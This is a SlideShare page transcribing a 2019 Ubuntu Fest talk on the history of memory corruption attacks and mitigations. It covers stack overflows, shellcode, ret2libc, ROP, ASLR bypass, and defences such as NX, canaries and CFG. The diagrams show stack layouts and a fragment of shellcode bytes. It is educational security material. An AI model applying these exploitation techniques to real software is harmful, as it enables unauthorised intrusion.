Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Memory Attack - The Memory Attack Techniques

53 views

Published on

2019.05.26 - Ubuntu Fest, Daejeon (우분투 페스트, 대전)

Published in: Software
  • Be the first to comment

  • Be the first to like this

Memory Attack - The Memory Attack Techniques

  1. 1. The Rise and Fall of 
 The Memory Attack Techniques 05. 26. Ubuntu Fest Kim Seong Min
  2. 2. Speaker Info 이름 : 김성민 직업 : 대학생 학번 : 16 (젊다!) 특기 : ARGOS 회장 취미 : 해킹 (멋있다!) 2
  3. 3. - Research Areas System / Network Security Reverse Engineering Mobile Application macOS / iOS Kernel Security - TMI Favorites : Drinking Alcohol…🤪, Playing Games My first “hello, world!” : 3 years ago Wanna be offensive security researcher :D 3
  4. 4. 목 차 1교시 메모리 공격이란? 2교시 스택을 때리자 3교시 창과 방패의 발전 4교시 질의응답
  5. 5. 메모리 공격이란? - Memory Bugs and Attack - Segmentation Fault - Types of Memory Bugs - Types of Memory Attack
  6. 6. 6 Memory Attack 시스템 해킹의 꽃 (메모리 공격 ⊂ 시스템 해킹) Attack : Trigger a vulnerability (Exploit) To write whatever I want in anywhere I want
  7. 7. 7 Memory Bugs and Attack Memory Bugs (Errors) != Memory Attack Every vulnerabilities are bugs, 
 but not every bugs are exploitable (maybe…?) [2014 CodeEngn Conference 10] 심준보 - 급전이 필요합니다
  8. 8. 8 Memory Bugs Typically, could be occurred because of unsafe languages (e.g. C, C++, …) Also cause segmentation fault sometimes Allow low-level memory access Allow weakly enforced typing Explicit memory management
  9. 9. 9 Segmentation Fault Notify an OS the software has attempted to access a restricted area of memory Good news for hackers or, you There are some memory errors that would be exploitable!
  10. 10. 10 Types of Memory Bugs De-reference pointer that is out of bounds
  11. 11. 11 Types of Memory Bugs De-reference pointer to the freed memory [pwnable.kr - Toddler’s Bottle] uaf, 8pt Dangling pointer
  12. 12. 12 Types of Memory Attack Code corruption Control-flow hijack Data-only Information leak “Eternal War in Memory” published in IEEE S&P Symposium, 2013
  13. 13. 13 Types of Memory Attack A Barresi, “Fighting the War in Memory”, 2014 Control-flow hijack
  14. 14. 14 Types of Memory Attack Information leak canary value (important information for security) output data should be interpreted
  15. 15. 스택을 때리자 - Memory Layout Overview - Stack Memory - Basic Stack-based Attack - NX Stack and Canaries - Return to Oriented Programming
  16. 16. 16 Memory Layout Overview 메모리 구조 (간단하게만!) TEXT DATA BSS HEAP … STACK 코드 전역변수 동적 할당 함수, 임시 데이터 등 low high
  17. 17. 17 Memory Layout Overview TEXT (CODE) 영역 TEXT DATA BSS HEAP … STACK 코드 전역변수 동적 할당 함수, 임시 데이터 등 - 프로그램 실행 코드가 여기 있음 - 기계어 들이 있음 low high
  18. 18. 18 Memory Layout Overview DATA & BSS 영역 TEXT DATA BSS HEAP … STACK 코드 전역변수 동적 할당 함수, 임시 데이터 등 - 전역 변수, 정적 변수 등 - DATA : 초기화 된 데이터 - BSS : 초기화 되지 않은 데이터 low high
  19. 19. 19 Memory Layout Overview HEAP 영역 TEXT DATA BSS HEAP … STACK 코드 전역변수 동적 할당 함수, 임시 데이터 등 - 동적 할당 영역 - malloc low high
  20. 20. 20 Memory Layout Overview STACK 영역 TEXT DATA BSS HEAP … STACK 코드 전역변수 동적 할당 함수, 임시 데이터 등 - 지역 변수 - 임시 값 - 이제부터 볼 영역 low high
  21. 21. 21 Stack Memory Standard Stack Frame of function 0x41414141 0x42424242 0x43434343 0x00444444 0x00000000 SFP RET low high
  22. 22. 22 Stack Memory RETurn address? (RET) func2 func1 main call func1 call func2 ret ret func2 Stack Frame func1 Stack Frame main Stack Frame low high
  23. 23. 23 Stack Memory Stack Frame Pointer? (SFP) func’s stack frame 0xFFFFD588 0xFFFFD56C 0x41414141 0x42424242 0x43434343 0x00444444 0x00000000 SFP (0xFFFFD588) RET SFP RET func’s stack frame main stack frame low high
  24. 24. 24 Basic Stack-based Attack Buffer Overflow - Overruns the buffer’s boundary - Overwrites adjacent memory locations - First described in October, 1972
 (Computer Security Technology Planning Study) 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 SFP
 0x41414141 RET
 0x41414141
  25. 25. 25 Basic Stack-based Attack Control-flow hijack with BOF : Call ‘evil’ function Trigger bug : jump to vuln() function 0x41414141 0x41414141 SFP
 0x41414141 RET
 0x08048486
  26. 26. 26 Basic Stack-based Attack Control-flow hijack with BOF : Execute shellcode 0x41414141 0x41414141 SFP
 0x41414141 RET
 &shellcode 0x41414141 0x6850c031 0x68732F2F … on somewhere in memory The set of instructions that executes shell
  27. 27. 27 Basic Stack-based Attack Morris Worm (1988) - First computer worm - Exploiting buffer overflow
  28. 28. 28 NX Stack and Canaries Non eXecutable Stack (1997) - Prevent executing code
 in specific areas (e.g. stack, heap) - W^X (on BSD)
 DEP (on Windows) - Text (Code) segment is non-writable
 Stack (Heap) segment is non-executable 0x41414141 0x41414141 0x41414141 RET 0x41414141 0x6850c031 0x68732F2F … crash‼
  29. 29. 29 NX Stack and Canaries NX in GDB (Stack is not executable)
  30. 30. 30 NX Stack and Canaries Stack Canary (1998) - Place specific patterns called ‘canaries’ between stack variables and return address - Design to detect stack BOF - Cheap and powerful - Bypass using information leak 0x41414141 canary
 0x41414141 0x41414141 RET 0x41414141 0x6850c031 0x68732F2F … crash‼
  31. 31. 31 Return 2 Oriented Programming ret2libc (1997) - No code injection needed - Bypassing the NX protection 0x41414141 0x41414141 SFP
 0x41414141 RET
 &system instructions… … system
  32. 32. 32 Return 2 Oriented Programming ret2plt (2001) - Call dynamic lib’s function via PLT - Bypassing the NX protection 0x41414141 0x41414141 SFP
 0x41414141 RET
 &puts@plt
 &system@plt … system@plt … instructions… … Procedure Linkage Table system
  33. 33. 33 Return 2 Oriented Programming Krahmer’s code snippet reuse (2005) - Code reuse instead of entire
 libc functions - Use “gadgets” or “snippets” - 진짜 프로그래밍을 다시 하는 느낌 - “ROP” 0x41414141 0x41414141 SFP
 0x41414141 RET
 &gadget1 Fake RET
 &gadget2 instructions… instructions… instruction (ret) instructions… instruction (ret) gadget1 gadget2
  34. 34. 창과 방패의 발전 - ASLR : The end of memory war? - Bypassing ASLR - And, New Mitigations - Endgame
  35. 35. 35 ASLR : The end of memory war? Address Space Layout Randomization - PAX team’s ASLR (2001) - Randomness in the address space layout of processes - 전략?
 Per process (Linux)
 System-wide per boot (Windows) - PIC & PIE required
  36. 36. 36 A Barresi, “Fighting the War in Memory”, 2014
  37. 37. 37 Bypassing ASLR - Brute-force Attack (Low entropy)
 it’s pretty good in x32, but almost impossible in x64 - Information Leak
 Find base address of specific segment
  38. 38. 38 And, New Mitigations Enhanced Mitigation Experience Toolkit (EMET) - MS Windows를 위한 보안 툴킷 - Windows 보안 기능 활성화 및 설정을 도움 - 개인 PC 사용자 레벨(Non-kernel) 보안 - ROP 기법에 대한 보호
  39. 39. 39 And, New Mitigations Control Flow Guard (CFG) - Visual Studio 2015에서 지원하는 mitigation - 호출하는 함수가 유효한지 확인하는 로직을 추가함 - CFG 검사 실패 시, 프로그램을 강제로 종료시킴 - 악의적인 함수 또는 명령어 세트 호출을 원천 봉쇄
  40. 40. 40 Endgame
  41. 41. 41 Endgame But, hackers never die… - 스택이 안되면 힙을 때리면 되잖아? - 아니면 다른 버그들을 이용해도 되잖아? - Heap Spraying, Heap Feng Shui, Type Confusing, 
 Use-After-Free, so on… - 때릴건 아직도 많이 남아 있다
  42. 42. 42 Endgame Mitigation is not “Deus Ex Machina” - 미티케이션은 거들 뿐 - 다 뚫리고 막고를 반복하고 있다 - 버그를 만들지 않으려는 노력이 중요하다
  43. 43. 떠든애 김성민 1교시 메모리 공격이란? 2교시 스택을 때리자 3교시 창과 방패의 발전 4교시 질의응답 Q & A Thank you for listening!

×